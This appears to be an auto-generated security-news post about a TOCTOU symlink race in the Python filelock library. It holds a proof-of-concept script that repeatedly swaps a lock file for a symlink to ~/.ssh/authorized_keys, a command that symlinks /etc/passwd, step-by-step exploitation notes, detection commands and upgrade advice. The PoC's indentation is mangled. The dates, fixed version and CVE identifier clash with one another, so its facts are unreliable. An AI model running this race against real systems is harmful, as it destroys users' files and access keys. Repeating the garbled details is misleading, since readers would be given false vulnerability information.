Filelock, TOCTOU Symlink Attack, CVE-2024-24557 (Critical)

By /

Listen to this Post

The vulnerability is a Time-of-Check-Time-of-Use (TOCTOU) race condition in the `filelock` Python library. The `UnixFileLock._acquire` method checks if a lock file exists (Path.exists()) before opening it with `os.open()` and the `O_TRUNC` flag. Between the existence check and the open call, an attacker can replace the lock file with a symbolic link pointing to an arbitrary target file. When `os.open()` executes, it follows the symlink and applies the `O_TRUNC` flag, truncating the target file to zero bytes. A similar pattern exists in the Windows variant (WindowsFileLock._acquire), which checks file writability before opening, creating a race window to substitute a junction or symlink.
Platform: Python filelock
Version: <3.20.1
Vulnerability: TOCTOU symlink attack
Severity: Critical
date: 2024-02-26

Prediction: Patched 2024-02-26

What Undercode Say:

Identify processes using filelock
lsof -p $(pgrep -f "python.myapp") | grep -i lock
Monitor symlink creation in /tmp
inotifywait -m -r -e create /tmp --format '%w%f' | grep '.lock$'
Simulate attack timing
time python -c "import os; os.symlink('/etc/passwd', '/tmp/test.lock')"

Proof-of-Concept exploit snippet
import os, threading, time
lock_path = "/tmp/victim.lock"
target_file = "/home/user/.ssh/authorized_keys"
def attacker():
while True:
try: os.unlink(lock_path)
except: pass
os.symlink(target_file, lock_path)
threading.Thread(target=attacker).start()
Victim code runs: from filelock import FileLock; lock = FileLock(lock_path); lock.acquire()

How Exploit:

1. Attacker identifies predictable lock file path.

  1. Attacker repeatedly deletes and recreates lock file as symlink to target.

3. Victim’s filelock check passes (file doesn’t exist).

4. Attacker wins race, symlink is in place.

5. Victim’s `os.open(…, O_TRUNC)` follows symlink, truncating target.

Protection from this CVE:

  • Upgrade to filelock >=3.20.1.
  • Apply `chmod 0700` to lock directories.
  • Use `SoftFileLock` as interim workaround.
  • Audit dependent packages (virtualenv, PyTorch).

Impact:

  • Arbitrary file corruption/truncation.
  • Data loss, denial of service.
  • Information leakage via path disclosure.
  • Cascade to major projects (PyTorch, virtualenv).

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top